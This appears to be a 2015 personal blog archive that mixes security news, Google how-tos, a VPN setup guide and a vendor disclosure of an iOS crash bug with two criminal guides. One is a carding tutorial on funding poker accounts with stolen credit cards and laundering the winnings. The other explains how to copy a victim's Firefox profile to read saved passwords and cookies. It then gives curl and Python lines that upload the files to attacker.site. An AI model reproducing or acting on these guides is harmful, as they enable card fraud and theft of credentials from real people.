Saturday, April 25, 2015

Apple security features can be easily bypassed, says researcher

Apple security features can be easily bypassed, says researcher





Security tools baked into Macs designed to protect users from malicious content can be easily bypassed, according to one security researcher.


In a talk at the RSA Conference in San Francisco on Thursday, Synack director of research Patrick Wardle described how two OS X security tools can be bypassed to run malware.
"It's trivial for any attacker to bypass the security tools on Macs," said Wardle, according to ThreatPost. "If Macs were totally secure, I wouldn't be here talking."
Those two security features, Gatekeeper and XProtect, were added in the more recent versions of OS X in response to a rising threat of malware aimed at the alternative operating system.
Gatekeeper, added in OS X 10.8 "Mountain Lion," restricts which apps can be opened and run on a computer. Most have it set to apps verified through the Apple App Store, or from verified developers. XProtect, a rudimentary malware scanner for the Mac introduced even earlier in OS X 10.6 "Snow Leopard," can block certain apps and plugins from running if there are known vulnerabilities.
"Gatekeeper doesn't verify extra content in the apps," said Wardle. When the app is opened, either Gatekeeper knows where it's from and allows it, or it doesn't and it shuts the app down. But it doesn't continually check the app, which Wardle said can be a problem. "So if I can find an Apple-approved app and get it to load external content, when the user runs it, it will bypass Gatekeeper," he said.




(Image: Patrick Wardle/Synack)
He also said XProtect was "trivial" to bypass.
By recompiling a known malware sample to change its hash, Wardle could sneak the malware past XProtect and run it on the target computer. Although he called XProtect's sandboxing feature "strong," it can be bypassed with a number of known vulnerabilities at the kernel level, which he said undermine its security.
We reached out to Apple for comment, but did not immediately hear back.


Thursday, April 23, 2015

write your search terms with your finger instead of typing the words on the keyboard

 Write your search terms with your finger instead of typing the words on the keyboard


You can write your search terms with your finger instead of typing the words on the keyboard. As you write, your handwritten text converts into words in the search box.

https://www.youtube.com/watch?v=uyeJXKfAcpc

Turn Handwrite on or off

  1. Visit the Search settings page from your phone or tablet. 
  2. Go to the Handwrite section.
  3. Select Enable to turn on and Disable to turn off.
  4. At the bottom of the page, touch Save.
Note: You might need to refresh your browser to see the changes you've made.

How to search using Handwrite

  1. Once Handwrite is turned on, visit google.com on your mobile device.
  2. In the lower right corner of the screen, touch the Handwrite icon .
  3. Use your finger to start writing your search terms anywhere on the screen. As you write, your handwritten text converts into typeface in the search box.
  4. Touch the search icon to start your search .

Tips and tricks

  • Delete letters: Touch the backspace icon at the bottom of the page .
  • Start over: Touch X in the search box at the top of the page.
  • Clarify characters: When you type a character that could be mistaken for another, like 0 (the number) and O (the letter), a list of options might appear at the bottom of the screen.
  • Use predictions: To help save you time, a list of predicted search terms might appear in the search box as you write. Touch a prediction to search for that term, or touch the arrow to the right of a query to explore related searches .
  • Include symbols: Try symbols and special characters like +, @, &, and $.

Availability

You can use Handwrite on these devices:
  • Android 2.3+ phones
  • Android 4.0+ tablets
  • iOS 5+ phones & tablets

how to crash an iPhone with a wireless DoS attack

 crash an iPhone with a wireless DoS attack


In today’s RSA Conference presentation, (Tuesday, April 21, 2015 | 3:30 PM – 4:20 PM | West | Room: 2001) Adi Sharabani, CEO and my fellow co-founder at Skycure,  and I covered the lifecycle of vulnerabilities and vendor pitfalls. We also shared some details about a vulnerability our team recently identified in iOS 8 — a vulnerability that we are currently working with Apple to fix.
In this post, I’d like to share a few anecdotes from our vulnerability research process:

How it all started
Skycure is a leader in mobile threat defense solutions. As offense is a crucial part of any defense solution, our research team frequently performs experiments to check how mobile devices behave in various scenarios. One day, during preparation for a demonstration of a network-based attack, we bought a new router. After setting the router in a specific configuration and connecting devices to it, our team witnessed the sudden crash of an iOS app.

After a few moments, other people started to notice crashes. Pretty quickly, we realized that only iOS users were suffering from crashes.

QA Issue or Security Exposure?
To many, the iOS app crashes may seem simply like a quality issue. In most cases, people would just install a different firmware and move on.
However, we needed to dig deeper. We believe that incidents dismissed often as QA issues sometimes underlie an actual threat. Elisha and Roy from our research team started to analyze the crashes further and identified the source of the problem. Basically, by generating a specially crafted SSL certificate, attackers can regenerate a bug and cause apps that perform SSL communication to crash at will. With our finding, we rushed to create a script that exploits the bug over a network interface. As SSL is a security best practice and is utilized in almost all apps in the Apple app store, the attack surface is very wide. We knew that any delay in patching the vulnerability could lead to a serious business impact: an organized denial of service (DoS) attack can lead to big losses.

Again, we’ve reported the issue to Apple per our responsible disclosure process. As the vulnerability has not been confirmed as fully fixed yet, we’ve decided to refrain from providing additional technical details, in order to make sure iOS users are not exposed to the exploit caused by this vulnerability.

Impact on iOS
An even more interesting impact of the SSL certificate parsing vulnerability is that it actually affects the underlying iOS operating system. With heavy use of devices exposed to the vulnerability, the operating system crashes as well. Even worse, under certain conditions, we managed to get devices into a repeatable reboot cycle, rendering them useless.

The aforementioned is interesting in particular, as it puts the victim’s device in an unusable state for as long as the attack impacts a device. Even if victims understand that the attack comes from a Wi-Fi network, they can’t disable the Wi-Fi interface in the repeated restart state as shown in the video.

No iOS Zone
In 2013, we disclosed another vulnerability, which we called WiFiGate. In a nutshell, the impact was that an attacker could create their own network, and force external devices to automatically connect to it. Combining techniques such as WiFiGate or Karma attacks with this new discovery can allow an attacker to form a iOS . Envision a small device, which automatically captures any iOS device in range and gets it to join a fake network. Then, it issues the attack and crashes attacked iOS devices again and again. Victims in range cannot do anything about it. Think about the impact of launching such an attack on Wall Street, or maybe at the world’s busiest airports, or at large utility plants. The results would be catastrophic.

Fortunately, we keep a close eye on all the mobile threats and exploits around the world using our Mobile Threat Intelligence platform and have not yet seen any exploit related to this vulnerability. Users can always download a free version of Skycure available on both platforms (iOS and Android) to detect any active threat or attack on their device.


Remediation
Users might be able to avoid this vulnerability exploit in a number of ways:
  1. Users should disconnect from the bad Wi-Fi network or change their location in case they experience continuous crashing or rebooting.
  2. The latest iOS 8.3 update might have fixed a few of the mentioned threats–users are highly advised to upgrade to the latest version.
  3. In general, users should avoid connecting to any suspicious “FREE” Wi-Fi network.


Acknowledgements

Thanks to Elisha and Roy in the Skycure research team for their continued great work. I would also like to thank Apple’s security team for their cooperation and continued commitment to the security of Apple’s user base.

download your entire search history from Google

Now download their entire Google search history 

that's every query ever made while the user was signed in.

To download the archive, Google Search users need to sign in and go to their Google Account History page, then click on the gear icon and select Download.
As the file is potentially sensitive, Google urges users to read its warnings, which are "not the usual yada yada". Google advises that the archive shouldn't be downloaded on a public computer and, if it is to be exported to another cloud storage service, that the user reads their export policy in the event they want to take their files elsewhere in future.

Google will send an email to notify a user when the download is complete, with a link to the data, which will be transferred to a Takeout folder in Google Drive. The user will find a .ZIP archive folder containing a series of .JSON files containing searches over quarterly periods.
Takeout is the feature that lets Google users download archives of multiple products, such as Gmail, YouTube, Google Photos, +1s, Hangouts, Calendars, and more. The feature launched in 2011 under its Data Liberation Front initiative, but it historically didn't include Search and still doesn't include Google Wallet.
The new capability was first spotted by the Google System blog, which noted that Google started testing the archive download feature for Search last year.
Google's product forums show that people have been using the feature, with mixed success, to download their history since at least February. Google told Venture Beat that it released the feature in January.
Other companies that allow users to download and store an archive of their activities include Facebook and Twitter.
Two things worth noting are that downloading search history only gives the user a copy of their archive held by Google and doesn't delete the history from the users Web & App Activity page. Google provides instructions how to do that here

Delete searches & browsing activity

Your searches and browsing activity are saved in your Web & App Activity when it's turned on and you're signed in to your Google Account. You're in control of what's saved, and you can delete it or turn the setting off whenever you like.

Delete your searches and browsing activity

You can delete your past searches or other activity from your Web & App Activity page. Learn more about what's saved in your Web & App Activity.

Computer:-

Delete items one at a time

 

  1. Visit your Web & App Activity page.
  2. Check the box next to the items you want to remove.
  3. Click Remove items at the top of the page.

Delete multiple

  1. Visit your Web & App Activity page.
  2. In the top right corner of the page, click Options Settings > Remove items.
  3. Choose the time period for which you want to delete your history. (To remove all items, select The beginning of time).
  4. Click Remove.
Note: If you turned on the option to include history from Chrome and other apps in your Web & App Activity, visit the additional Web & App Activity page to see that information. If you only want to remove additional Web & App Activity from a certain device, choose that device in the "Remove items" dropdown menu.

Android App


Tip: If you want to delete your recent searches under the search box, touch and hold the search you want to delete > OK. The search will be deleted from the Google app and your Web & App Activity.

Delete items one at a time

  1. Visit your Web & App Activity page.
  2. Check the box next to the items you want to remove.
  3. Touch Remove items at the top of the page.

Delete multiple

  1. Visit your Web & App Activity page.
  2. In the top right corner of the page, touch Options Settings > Remove items.
  3. Choose the time period for which you want to delete your history. (To remove all items, select The beginning of time).
  4. Touch Remove.
Note: If you turned on the option to include history from Chrome and other apps in your Web & App Activity, visit the additional Web & App Activity page to see that information. If you only want to remove additional Web & App Activity from a certain device, choose that device in the "Remove items" dropdown menu.

Mobile Browsers


Delete items one at a time

  1. Visit your Web & App Activity page.
  2. Check the box next to the items you want to remove.
  3. Touch Remove items at the top of the page.

Delete multiple

  1. Visit your Web & App Activity page.
  2. In the top right corner of the page, touch Options Settings > Remove items.
  3. Choose the time period for which you want to delete your history. (To remove all items, select The beginning of time).
  4. Touch Remove.
Note: If you turned on the option to include history from Chrome and other apps in your Web & App Activity, visit the additional Web & App Activity page to see that information. If you only want to remove additional Web & App Activity from a certain device, choose that device in the "Remove items" dropdown menu.


Thursday, April 16, 2015

online casino fraud

online casino fraud

Work in the followings Countries:
Best: ES, FR, DE, AU, IT, FI. (possible deposit withdraw, acceptance of lots of bins)
Where can be problems: US, CA, UK. ( USA and CA don’t accept gambling money, UK cards are dying quick and can
have too little balance or SMS-alerts);
Some rooms which accept USA CC:
SportsBook Poker
PlayersOnly Poker
Carbon Poker
Poker Stars
Bodog Poker
Only Poker
Super Book Poker
Full Tilt
And etc.
Accept the room your USA CC or don’t depends of BIN, more exactly – from the bank. USA is only for beginners and
for “loosing”.
Europe is better because you can use any data instead of holder’s name, address etc. All you need are card number, exp
and cvv. Ipoker’s rooms check any information before sending to merchant. It’s often helps to contact with support.
Always check on valid your card before carding. ClickAndBuy.com -> New...
If you see that limit in the room is less than $600 – better look for another room of this poker net. It’s possible that
you’ll find the room with bigger limit.
If your account is automatically locked after you’ve made the deposit – use payment systems. You can card any
payment system where uses CC for uploading funds. I advise you to use moneybookers. It still cards good. Either
directly from CC or through merchant (you’ll have to accept SMS in the appropriate country or use the card with VBV
or MCSC – in this way you don’t have to accept SMS)
Also there are some exotic systems for carding like clickandbuy etc. but it’s not for public. Payment systems are
ALWAYS better for “loosing”. But there’re not good for cashing out.
What to do after money are deposited?
So we already have an account with money. Further we can:
- bet and win till $2000 on balance and:
1) sell for 10-20% from balance (deposit without withdraw 15-20%. To withdraw is possible only on Visa CCs which
were made not in USA). Maximum profit from account is about $400.
2) “lose” won money to a clean account (“lose” carded money is already not good idea). Today is actual loosing in DoN
(double or nothing) and timplay of expencive tournaments with less than 100 players (you should have a least three
carded accounts). Holdem on NL100-NL400 is almost dead so it’s not worth it if it isn’t “standard” working limits of
clean accounts. Also you can lose from carded account till some “trust limit’ (it’s made by security service of the room
and usually $20-$100) and withdraw on fresh-registered account – it’s stable profit for people who don’t wait “jack-
pots” and just want to work and earn. Profit from $500.
3) Give for cashing out. Profit to $1000.
4) Make a deposit by yourself and withdraw (moneybookers, neteller, webmoney etc). Account in payment system
should be made with the same info (country, name, addres) which you used during registration of poker account. Then
make transfer to account for cashing out with linked credit card or bank account.
- do the direct transfer to clean account BUT you mustn’t order a withdraw on clean one! There are a lot of rooms where
transfers work. In 90% won money are transferred without documents and shiet like this. I advise you to use one more
account between carded and clean Till they will lock and investigate the chain your chances of success are growing.
- if you made deposit on promoted account (account with big history of playing and transactions) then you can win
come money and right after that withdraw the money to the account where you’ve already made withdraw. Security
service will start to work only after “fraud notification”. You can also make a deposit from CC on your own cleanaccount from cards of another countries and payment systems’ accounts. Sometimes you’ll be lucky and your clean
accounts will present you for about $1000 a week. For example in Titan was verified account with documents and some
cashouts which lived without locks for about a month and there were some “dirty” deposits through MB merchant (read
the first article if you don’t understand what I’m talking about), play “for vision” and made withdraw on WebMoney.
I’ve got a lot of points and I decided to order a bonus – but security servise got up and locked the account explained that
I had no permission to take this bonus.
Similar situation was in PS and FTP where deposits were made with good CC on promoted accounts. Then withdraws
were ordered.
Now poker is dead for people which just want to press a couple of buttons and don’t invent any new ways. There are
always enough bugs in different rooms – just you must be able to find and use it.

To obtain a pass list in Firefox

To obtain a pass list in Firefox just go to victim PC and go to the folders:


C:\\USERS\\victimuser\\APPDATA\\LOCAL\\MOZILLA\\FIREFOX\\PROFILE\\
and copy the folders inside this "profile" folder

and

C:\\USERS\\victimuser\\APPDATA\\ROAMING\\MOZILLA\\FIREFOX\\

and copy the folder called "Profiles" and copy the file called "profiles.ini"

Go to the another PC and replace the copied folders in similar locations, open Mozilla Firefox, go to Settings/ Security and expand passwords list


OR


%USERPROFILE%
or even
%APPDATA%

And maneuver from there. VBScript, ps1, or batch can be readily used for this style. To find that with say python....
http://support1.geomagic.com/link/portal/5605/5668/Article/2141/How-can-I-find-the-current-User-folders-using-Python

I'm sure there's an asm way to do it, and windows has the stupid winkernel you could throw a bitch fit at and make it find it, but that would mean dealing with mdsm and reading things about windows without complaint.



Oh, related note: you can clone this stuff from linux to. But instead of cloning the entire folder structure:
sqlite3 ~/.mozilla/firefox/*.default/signons.sqlite
or
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite*
or
sqlite3 ~/.mozilla/firefox/*.default/places.sqlite

ect..

For a quick copy/upload elsewhere of course, there's many silly ways to work that out:
curl -x localhost:4445 -d `cat $file` https://attacker.site/receiving.script
or python:
a=open(file)
requests.post("https://attacker.site/receiving.script", verify=False, data=a)

For Educational Propose

Tuesday, April 7, 2015

How to setup VPN on Kali Linux and Ubuntu

How to setup VPN on Kali Linux and Ubuntu 


Courtesy of BlackMoreOps

Thought it was important enough to share.
==================================

Every day millions of people uses different VPN service providers to protect their online privacy. But it not all VPN providers are as anonymous or as secured or dedicated to protecting your Online privacy as they claim to be. A very detailed guide on how to setup VPN on Kali Linux and Ubuntu - blackMORE OpsSome VPN service providers even log your activity and if you are living in a country where certain sites are not allowed or you might get prosecuted for doing something as simple as scanning a network (yes, it’s in-fact an offense in many First World countries). I wrote this article on fixing VPN grayed out problem in Kali Linux. Many readers asked me to write a complete guide on how to set up VPN and which ones are secured.

Fact is, I simply cannot test all VPN providers. I cannot vouch for other users experiences and I usually only write stuffs I am sure about. Of many VPN providers, PrivateInternetAccess is claimed to be the best and fastest and according to their ToS and Privacy Policy, they seems to be well praised and recommended by several reviews such as done by TorrentFreak and LifeHacker. I strongly suggest readers to do some research before committing to any providers.

Following eight questions were taken from TF website and I feel that you should be asking yourself the same questions before going for any VPN providers: (I’ve added some comments below, your opinion might be different).

    Do you keep ANY logs which would allow you to match an IP-address and a time stamp to a user of your service? If so, exactly what information do you hold and for how long?
                  No logs.
    Under what jurisdictions does your company operate and under what exact circumstances will you share the information you hold with a 3rd party?
                  Out of US, GB or any NATO affiliated countries if possible. But then you compromise on speed. Alternatively suspend user account instead of handing over logs or data.
    What tools are used to monitor and mitigate abuse of your service?
                  Other than abuse blocking and service uptime, no monitor at all.
    In the event you receive a DMCA takedown notice or European equivalent, how are these handled?
                  Suspend user account instead of handing over logs or data.
    What steps are taken when a valid court order requires your company to identify an active user of your service?
                  Suspend user account instead of handing over logs or data.
    Is BitTorrent and other file-sharing traffic allowed on all servers? If not, why?
                  I never cared for BT, but I guess no discrimination on any type of traffic.
    Which payment systems do you use and how are these linked to individual user accounts?
                  Anything and everything. Best would be BitCoin. Setup own BTminer and pay with that. In that way, little/no online trace whatever.
    What is the most secure VPN connection and encryption algorithm you would recommend to your users?
                  AES-128, RSA2048 or higher supported. Don’t use SHA1.

As I mostly use Kali Linux, my primary concentration would be on that. However, Kali Linux and Ubuntu uses same Network Manager, so this guide applies to the any Debian variant such as Kali Linux, and Ubuntu variants such as Linux Mint etc.  In short, if you follow this guide, you will be able to setup VPN on Kali Linux, Ubuntu, Debian Linux Mint etc.

Setup VPN on Kali Linux


I use Kali Linux despite many of it’s flaw and shortcomings and I have became used to it. If you’re seriously about Online privacy, stick with the distro you know and understand best. Kali is just another Linux distro and it is as secured as you make it. There are many ways you can do it. VPN to Tor to VPN via anon proxy.
Why use VPN – benefits?

Here’s my top 11 reasons why you would want to use VPN services.

    1. VPN provides Privacy and cloaks your IP address.
    2. Use any network (public or private or free WiFi) with encryption
    3. Login to your home or Work network from anywhere with confidence.
    4. Bypass censorship and content monitoring.
    5. Browse and bypass Firewall and censorship policy at work or Anywhere!
    6. Access region restricted services from anywhere (i.e. Youtube videos, NetFlix or BBC Player etc.)
    7. Transfer or receive files with privacy.
    8. Hide your voice/VOIP calls.
    9. Use Search Engines while hiding some of your identity.
    10. Hide yourself
    11. Cause you like to be anonymous.

As you can see from the list above, VPN not necessarily hides everything. Search engines can probably still recognizes you based on your cookies, previous browsing behavior, account sign-in (duh!), browser plug-ins (i.e. Alexa, Google Toolbar etc.).

Step 1: Enabling VPN on Kali Linux


By default the VPN section is grayed out on Kali Linux. You can follow my guide on fixing VPN grayed out issue (with screengrabs) or just copy paste the commands from below:

There’s two variants on the commands I’ve used, the first one enables all sorts of VPN and PPTP mumbo-junbo’s so that you don’t have to work your way through it later.

Code: [Select]
root@kali:~# aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-strongswan network-manager-vpnc network-manager-vpnc-gnome

The second one is more specific to VPN and just enabling VPN

Code: [Select]
root@kali:~# apt-get install network-manager-openvpn

On some cases, you might have to restart network-manager and networking,

Code: [Select]
root@kali:~# service networking restart
[....] Running /etc/init.d/networking restart is deprecated because it may not r[warnble some interfaces ... (warning).
[ ok ] Reconfiguring network interfaces...done.
root@kali:~# 
root@kali:~# service network-manager restart 
[ ok ] Stopping network connection manager: NetworkManager.
[ ok ] Starting network connection manager: NetworkManager.
root@kali:~#

Once done, it will fix your VPN grayed out issues. For other Linux distro, this isn’t so much of a problem as those packages are usually pre-installed. (which I find a waste as your distro becomes bulkier).

Step 2: Download and extract openvpn certs from PIA
Download and extract the openvpn.zip file containing ca.crt in the correct directory:

Code: [Select]
root@kali:~# wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
--2015-02-27 13:14:14--  https://www.privateinternetaccess.com/openvpn/openvpn.zip
Resolving www.privateinternetaccess.com (www.privateinternetaccess.com)... 23.215.245.45
Connecting to www.privateinternetaccess.com (www.privateinternetaccess.com)|23.215.245.45|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8242 (8.0K) [application/zip]
Saving to: `openvpn.zip'

100%[======================================>] 8,242       --.-K/s   in 0s      

2015-02-27 13:14:15 (149 MB/s) - `openvpn.zip' saved [8242/8242]

root@kali:~# 
root@kali:~# unzip -q openvpn.zip -d /etc/openvpn
root@kali:~# 

Step 3: Configure Network Manager to use PIA VPN

Go to Network Manager > Edit Connections

Setup VPN on Kali Linux and Ubuntu 

Change to VPN Tab. VPN> Add

Click [ADD +] click the drop down menu, and set the type as OpenVPN.
Click [Create]

Go to “VPN” and fill up the following details”.

Connection name:
    PrivateInternetAccess VPN
Gateway:
    us-east.privateinternetaccess.com [**choose Gateway's from the list below]
Username:
    PIA Username
Password:
    PIA Password
CA Certificate: Browse to
    /etc/openvpn
and select
    ca.crt

Click [Advanced]: Check the box next to “Use LZO data compression“

Click [OK], [Save] and then [Close].

As for Gateways, choose on the following depending on your location:
PIA Regional Gateways

    United States (US VPN)
    us-midwest.privateinternetaccess.com
    us-east.privateinternetaccess.com
    us-west.privateinternetaccess.com
    us-texas.privateinternetaccess.com
    us-california.privateinternetaccess.com
    us-florida.privateinternetaccess.com

    Canada (CA VPN)
    ca.privateinternetaccess.com
    ca-toronto.privateinternetaccess.com

    United Kingdom (UK VPN)
    uk-london.privateinternetaccess.com
    uk-southampton.privateinternetaccess.com

    Switzerland (Swiss VPN)
    swiss.privateinternetaccess.com

    Netherlands (NL VPN)
    nl.privateinternetaccess.com

    Sweden (SE VPN)
    sweden.privateinternetaccess.com

    France (FR VPN)
    france.privateinternetaccess.com

    Germany (DE VPN)
    germany.privateinternetaccess.com

    Romania (RO VPN)
    ro.privateinternetaccess.com

    Hong Kong (HK VPN)
    hk.privateinternetaccess.com

    Israel (Israel VPN)
    israel.privateinternetaccess.com

    Australia (Australia VPN)
    aus.privateinternetaccess.com

    Japan (Japan VPN)
    japan.privateinternetaccess.com


Step 4: Connect to PIA VPN

Click Network Manager > VPN Connections > PrivateInternetAccess VPN

You will see a yellowish colored connection indicator while connecting.


Setting up VPN on Ubuntu


Ubuntu parts were taken from PIA support site. This also covers Linux Mint or any Ubuntu variants.

This is almost as easy as it gets. There’s 3 variations you can try to connect to PIA

    Use PIA script for Ubuntu 12.04 or higher
    Setup manually via Network Manager for Ubuntu 12.04 or higher
    Setup manually via Network Manager for Ubuntu 10.10

Ubuntu 1 : Ubuntu Linux 12.04: OpenVPN Installer
    Download the openvpn ubuntu installer
    Run sudo sh ~/Downloads/install_ubuntu.sh (replace path to installer accordingly)
    Type ‘y’ to install python 2.7 in case it’s not installed.
    Type ‘y’ to install network-manager-openvpn in case it’s not installed.
    Enter the login for your account.
    Wait for the installation to finish.
    Connect using the Network Manager.
    Enter your password when prompted (only needs to be done once per region).

Ubuntu 2: Ubuntu Linux 12.04: OpenVPN via Network Manager Setup

    Open a Terminal, and run: sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome. This will prompt for both your password, and a Y/n answer, please provide it with your password, and Y
    Once installed, open System Settings, then Network
    Press the + symbol to add a new connection, and select the VPN Interface, then press Create
    Choose OpenVPN as your VPN Connection Type, and press Create
    The following will walk you though all configuration steps needed for the PIA VPN.
        Gateway: Select one of the Hostnames provided on the Network page
        Authentication
            Type: Password
            Username: The username provided with the PIA account
            Password: The password provided with the PIA account
            CA Certificate: Downloaded this zip file and extract the ca.crt file to somewhere it won’t be deleted. We suggest your Home folder. If you extract this to your home folder, when searching for it, please click on your username on the left side, which will take you right to the home folder, then select the ca.crt file from the options on the right.
        Advanced: Under the general tab, check the Use LZO data compression
        IPv4 Settings:
            Method: Automatic (VPN) Addresses Only
    Press Save. If you chose to have your password saved it may ask for you to verify your password to open your keyring.

Ubuntu 3: Ubuntu Linux 10.10: OpenVPN Setup

    In Terminal, install openvpn packages with sudo apt-get install network-manager-openvpn.
    Restart the network manager with sudo restart network-manager
    Run sudo wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
    Extract the files from the zip with unzip openvpn.zip.
    Move ca.crt and crl.pem to /etc/openvpn
    Open the Network Manager on the menu bar.
    Choose add and select the OpenVPN connection type, and click Create.
    Enter Private Internet Access SSL for the Connection Name.
    Enter us-california.privateinternetaccess.com
  • for the Gateway

    Select Password and enter your login credentials.
    Browse and select the CA Certificat we saved in Step 3.
    Choose Advanced and enable LZO Compression.
    Apply and exit.
    Connect using the Network Manager.

Testing: Leak Test Sites

Once connected, you would like to head the following websites to confirm if you are leaking any informations

    For DNS Leak test, check here:
    http://dnsleak.com/
    For Email leak test, check here:
    http://emailipleak.com/
    Those who uses ipv6, check your leaks here:
    http://ipv6leak.com/

Conclusion

VPN is good, VPN is secure, VPN allows you to bypass proxies, Firewall, monitoring and content filtering. But there’s always that drama when you’re using VPN, it sometime is slow and sometime is not that secure you’d think. But for countries like Iran, Pakistan, Egypt, China, North Korea etc. where content filtering is done in National Level maybe it’s a way to get the voice out. I am not going to discuss legality here, so I will leave that to you.